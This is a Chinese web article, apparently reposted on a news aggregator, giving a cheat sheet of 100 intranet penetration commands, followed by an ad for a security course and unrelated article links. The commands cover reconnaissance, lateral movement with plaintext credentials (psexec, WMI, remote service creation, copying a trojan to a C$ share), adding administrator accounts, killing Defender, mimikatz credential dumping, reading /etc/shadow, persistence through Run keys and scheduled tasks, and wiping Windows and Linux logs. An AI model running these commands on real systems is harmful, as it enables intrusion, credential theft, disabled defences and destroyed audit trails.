当前位置: 首页 > news >正文

内网渗透测试100条命令大全!

内网渗透测试100条命令大全!

内网渗透是攻防演练与渗透测试的核心环节,信息收集、权限判断、横向移动、权限维持、痕迹清理每一步都依赖原生系统命令完成。本文按Windows内网命令、Linux内网命令、域环境命令、通用内网探测、文件操作、进程服务、痕迹清理七大实战场景,整理100条高频可用命令,供参考学习。


一、Windows 内网基础信息收集

    1. whoami—— 查看当前登录用户
    1. whoami /priv—— 查看当前用户权限列表(提权关键依据)
    1. whoami /all—— 查看用户SID、组、权限完整信息
    1. hostname—— 查看主机名
    1. systeminfo—— 系统版本、补丁、架构、域信息
    1. systeminfo | findstr KB—— 快速列出已打补丁
    1. ipconfig /all—— 网卡、IP、网关、DNS、是否入域
    1. ipconfig /displaydns—— 查看本地DNS缓存
    1. ipconfig /flushdns—— 清空DNS缓存
    1. arp -a—— 内网ARP表,查看同网段存活主机
    1. route print—— 路由表,判断多网卡、内网网段
    1. netstat -ano—— 查看所有端口、连接、对应PID
    1. netstat -ano | findstr ":3389"—— 筛选远程桌面端口状态
    1. net user—— 列出本地用户
    1. net localgroup—— 列出本地用户组
    1. net localgroup administrators—— 查看本地管理员
    1. net config workstation—— 快速判断是否入域
    1. ver—— 快速查看系统版本
    1. wmic os get caption—— 纯净输出系统版本
    1. wmic qfe list—— 补丁列表(比systeminfo更干净)

二、Windows 内网探测与端口扫描

    1. ping -n 1 -w 100 192.168.1.1—— 单发ping,快速探测存活
    1. for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.1.%i | findstr TTL—— 原生C段存活扫描
    1. tracert -d 目标IP—— 路由追踪(不解析域名,更快)
    1. net view—— 查看内网同工作组主机
    1. net view /domain—— 查看内网存在的域
    1. net share—— 查看本机开放共享
    1. dir \\127.0.0.1\C$—— 测试默认管理共享(C /ADMIN$)
    1. sc query—— 列出所有运行服务
    1. sc query winrm—— 检查WinRM远程管理状态
    1. sc query termservice—— 检查远程桌面服务状态
    1. tasklist /svc—— 进程+对应服务名
    1. tasklist | findstr lsass.exe—— 定位lsass进程PID

三、Windows 横向移动与远程执行

    1. net use \\IP\ipc$ "密码" /user:用户名—— IPC$连接
    1. net use \\IP\C$ /user:域\用户名 密码—— 挂载远程C盘
    1. copy 木马.exe \\IP\C$\Windows\Temp—— 远程文件上传
    1. psexec \\IP -u 用户名 -p 密码 cmd—— 远程获取Shell(需要管理员)
    1. wmic /node:IP /user:用户 /password:密码 process call create "cmd.exe"—— WMI远程执行
    1. sc \\IP create 服务名 binPath= "cmd.exe /c 命令"—— SC远程创建服务执行命令
    1. schtasks /create /s IP /u 用户 /p 密码 /tn 任务名 /tr 命令 /sc once /st 00:00—— 计划任务远程执行
    1. qwinsta /server:IP—— 查看远程主机登录会话
    1. tscon 会话ID /dest:console /server:IP—— 远程桌面会话劫持
    1. reg query \\IP\HKLM\SYSTEM—— 远程读取注册表
    1. net start /domain—— 查看域内启动的服务
    1. winrm quickconfig—— 本机快速开启WinRM
    1. Enter-PSSession -Computer IP—— PowerShell远程连接

四、Windows 权限提升与凭据获取

    1. wmic product get name,version—— 查看安装软件(寻找可提权程序)
    1. wmic service get name,startname—— 查看服务启动账户
    1. icacls c:\windows\system32—— 查看目录权限配置
    1. secedit /export /cfg c:\sec.cfg—— 导出本机安全策略
    1. net user 用户名 密码 /add—— 添加本地用户
    1. net localgroup administrators 用户名 /add—— 加入本地管理员
    1. net localgroup "Remote Desktop Users" 用户名 /add—— 开通远程桌面权限
    1. reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f—— 开启3389
    1. taskkill /f /im msmpeng.exe—— 强制结束Defender(需管理员)
    1. mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit—— 读取内存凭据(合法授权使用)

五、Windows 域环境渗透命令

    1. net time /domain—— 获取域控时间,定位域控IP
    1. nltest /dclist:域名—— 列出域控制器
    1. nltest /dsgetdc:域名—— 获取域控信息
    1. net user /domain—— 列出域内所有用户
    1. net group /domain—— 列出域内所有组
    1. net group "Domain Admins" /domain—— 域管理员列表
    1. net group "Enterprise Admins" /domain—— 企业管理员
    1. net group "Domain Computers" /domain—— 域内机器
    1. dsquery user—— 查询域用户(域管环境)
    1. dsquery computer—— 查询域内机器
    1. dsquery group—— 查询域内用户组
    1. set user—— 快速查看USERDOMAIN判断域环境
    1. gpresult /r—— 查看域策略
    1. wmic ntdomain list full—— 获取域信息
    1. nslookup -type=SRV _ldap._tcp—— LDAP服务定位域控

六、Linux 内网渗透命令

    1. id—— 当前用户UID/GID/权限
    1. whoami—— 当前用户
    1. uname -a—— 内核版本(提权关键)
    1. cat /etc/issue—— 系统版本
    1. cat /etc/passwd—— 本地用户
    1. cat /etc/group—— 本地组
    1. ifconfigip a—— 网卡IP信息
    1. route -n—— 路由表
    1. arp -a—— ARP缓存
    1. netstat -antlp—— 端口与进程
    1. ps -ef—— 进程列表
    1. find / -perm -u=s -type f 2>/dev/null—— 查找SUID提权文件
    1. sudo -l—— 查看sudo权限
    1. cat /etc/shadow—— 密码哈希(需root)
    1. ssh user@IP—— 内网SSH横向

七、内网通用:文件搜索、痕迹清理、权限维持

    1. dir /s /b c:*.txt | findstr password—— Windows搜索含密码文件
    1. find / -name "*.conf" -type f 2>/dev/null—— Linux搜索配置文件
    1. find / -name "*.bak" -o -name "*.old"—— 搜索备份文件
    1. del /f /s /q %windir%\prefetch*—— 清理预读取文件
    1. del /f /s /q "%userprofile%\Recent*"—— 清理最近访问记录
    1. cls—— 清空CMD屏幕
    1. history -c—— Linux清空历史
    1. echo > /var/log/wtmp—— 清空登录日志(Linux)
    1. echo > /var/log/secure—— 清空SSH日志(Linux)
    1. schtasks /create /tn 名称 /tr 路径 /sc onstart /ru system—— 开机启动维持权限
    1. reg add HKLM...\Run /v 名称 /t REG_SZ /d 路径 /f—— 注册表自启动
    1. at 12:00 shutdown /r /t 0—— 定时重启(测试用)
    1. wevtutil el—— 列出Windows日志
    1. wevtutil cl System—— 清空系统日志
    1. wevtutil cl Security—— 清空安全日志

学习资源


如果你也是零基础想转行网络安全,却苦于没系统学习路径、不懂核心攻防技能?光靠盲目摸索不仅浪费时间,还消磨自己信心。这份 360 智榜样学习中心独家出版《网络攻防知识库》专为转行党量身打造!

01内容涵盖

这份资料专门为零基础转行设计,19 大核心模块从 Linux系统、Python 基础、HTTP协议等地基知识到 Web 渗透、代码审计、CTF 实战层层递进,攻防结合的讲解方式让新手轻松上手,真实实战案例 + 落地脚本直接对标企业岗位需求,帮你快速搭建转行核心技能体系!

这份完整版的网络安全学习资料已经上传CSDN【保证100%免费】

**读者福利 |***CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 *(安全链接,放心点击)

02 知识库价值

  • 深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案
  • 广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南
  • 实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

03 谁需要掌握本知识库

  • 负责企业整体安全策略与建设的CISO/安全总监
  • 从事渗透测试、红队行动的安全研究员/渗透测试工程师
  • 负责安全监控、威胁分析、应急响应的蓝队工程师/SOC分析师
  • 设计开发安全产品、自动化工具的安全开发工程师
  • 对网络攻防技术有浓厚兴趣的高校信息安全专业师生

04部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

这份完整版的网络安全学习资料已经上传CSDN【保证100%免费】

**读者福利 |***CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 ***(安全链接,放心点击)**

文章来自网上,侵权请联系博主

http://www.cnnetsun.cn/news/2010182.html

相关文章:

  • Legacy iOS Kit:旧设备系统降级与越狱的终极技术方案
  • FEP管子 耐腐柔韧、适配性强,实验室流体输送专用
  • 三步搭建家庭影音中心:用115proxy-for-kodi实现云盘视频直连播放
  • 3大解决方案:用抖音下载器实现高效内容管理与创作素材收集
  • 终极Total War模组开发指南:如何用RPFM轻松创建专业级游戏模组
  • Java本地数据库访问的革新:SQLite JDBC如何实现零配置跨平台开发
  • 3步快速找回加密压缩包密码:免费开源工具终极指南
  • 如何一键转换图片格式:Chrome扩展的终极解决方案
  • SAP批次管理不止于追溯:如何用批次分割、双单位玩转库存与销售分析
  • 饲料颗粒机设计(农业机械)(含CAD零件图,装配图,说明书
  • AiBrianBox-V:空间感知节点(Spatial Sensor Node)
  • 不止于计数:用MCNP的FS卡玩转空间分辨,给你的模拟结果加个‘高德地图’
  • 工业现场调试笔记:RS485 Modbus通讯那些“玄学”故障,我是如何一步步定位解决的?
  • linux功能组件介绍
  • Hearthstone-Script:炉石传说自动化脚本的完整使用指南与实战技巧
  • 告别弹窗全家桶:用Geek Uninstaller和SoftCnKiller彻底清理电脑垃圾软件(附火绒收尾)
  • Windows Cleaner完整教程:5分钟学会磁盘清理技巧,彻底解决C盘爆满问题
  • 储能系统北美合规架构:基于FCC规范的边缘计算网关数采实践
  • 终极指南:如何基于Spring Cloud构建高可用医院信息系统(HIS)微服务架构
  • PyTorch炼丹手记:当你的Loss曲线像心电图一样震荡时,先别急着调学习率
  • 别再对着.nc文件发愁了!用Python的netCDF4库5步搞定气象数据读取与可视化
  • EasyJava代码生成器实战:如何让它智能识别数据库索引并生成对应方法?
  • 小红书下载器终极指南:一键批量下载无水印图文视频的完整解决方案
  • Windows注册表备份与迁移实战:用reg export/import命令搞定软件配置搬家
  • Adobe-GenP 3.0终极指南:快速批量激活Adobe CC全系列软件
  • 前端+AI项目学习笔记day12
  • E-Hentai下载器终极指南:如何快速批量下载并打包为ZIP文件
  • OriginPro 2021b 极坐标图保姆级教程:从数据导入到高级美化(含面积填充与刻度线避坑)
  • Thorium Reader架构解析:构建高性能跨平台电子书阅读器的技术实现
  • AXI-FULL协议实战:如何用SystemVerilog Assertions (SVA) 验证你的读写时序?